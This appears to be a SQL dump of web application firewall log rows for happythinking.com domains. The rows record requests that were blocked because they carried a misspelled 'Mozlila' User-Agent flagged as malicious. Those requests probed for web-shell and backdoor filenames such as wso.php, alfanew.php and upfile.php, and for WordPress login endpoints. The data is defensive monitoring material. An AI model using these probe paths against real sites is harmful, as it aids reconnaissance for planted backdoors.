(52015, 1712689840.382028, 1712689839.894300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp-sigunq.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNpZ3VucS5waHA=","category":"brute-force","ssl":1}'),
(52013, 1712689871.992337, 1712689871.553300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp-atom.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWF0b20ucGhw","category":"brute-force","ssl":1}'),
(52046, 1712761978.907022, 1712761978.600300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/network.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L25ldHdvcmsucGhw","category":"brute-force","ssl":1}'),
(52014, 1712689861.691600, 1712689861.328400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(52012, 1712689892.555482, 1712689892.209200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(52010, 1712689901.984754, 1712689901.606500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/install.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luc3RhbGwucGhw","category":"brute-force","ssl":1}'),
(52047, 1712761963.785982, 1712761963.423400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/cong.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(52011, 1712689896.946797, 1712689896.565100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(52009, 1712689905.174267, 1712689904.755700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(52048, 1712761917.626435, 1712761917.234900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wso.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzby5waHA=","category":"brute-force","ssl":1}'),
(52008, 1712689910.632082, 1712689910.197000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/mini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21pbmkucGhw","category":"brute-force","ssl":1}'),
(52007, 1712689924.472271, 1712689924.116100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/configs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmZpZ3MucGhw","category":"brute-force","ssl":1}'),
(52006, 1712689930.163279, 1712689929.826000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/test.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Rlc3QucGhw","category":"brute-force","ssl":1}'),
(51983, 1712689498.175385, 1712689497.836400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(51948, 1712637263.387506, 1712637262.967500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/blog.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jsb2cucGhw","category":"brute-force","ssl":1}'),
(51949, 1712637251.867244, 1712637251.493600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/moon.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21vb24ucGhw","category":"brute-force","ssl":1}'),
(51950, 1712637237.211154, 1712637236.833600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/ae.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FlLnBocA==","category":"brute-force","ssl":1}'),
(51982, 1712689502.599087, 1712689502.208700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(51951, 1712637222.354069, 1712637221.913400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/xmrlpc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(51952, 1712637207.203761, 1712637206.784300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMucGhw","category":"brute-force","ssl":1}'),
(51953, 1712637188.418332, 1712637188.080800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(52061, 1712762220.741713, 1712762220.412000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
(51981, 1712689506.489114, 1712689506.116900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(51954, 1712637175.230239, 1712637174.856000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/updates.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(51955, 1712637159.622819, 1712637159.256900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/404.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"LzQwNC5waHA=","category":"brute-force","ssl":1}'),
(51956, 1712637141.942292, 1712637141.564700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-login.php?action=register', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(51957, 0.000000, 1712639293.754203, '\0\0\0\0\0\0\0\0\0\0ÿÿz£B˜', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51958, 1712640050.025730, 1712640049.504500, '\0\0\0\0\0\0\0\0\0\0ÿÿ-€`Ô', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51980, 1712689509.929791, 1712689509.616700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
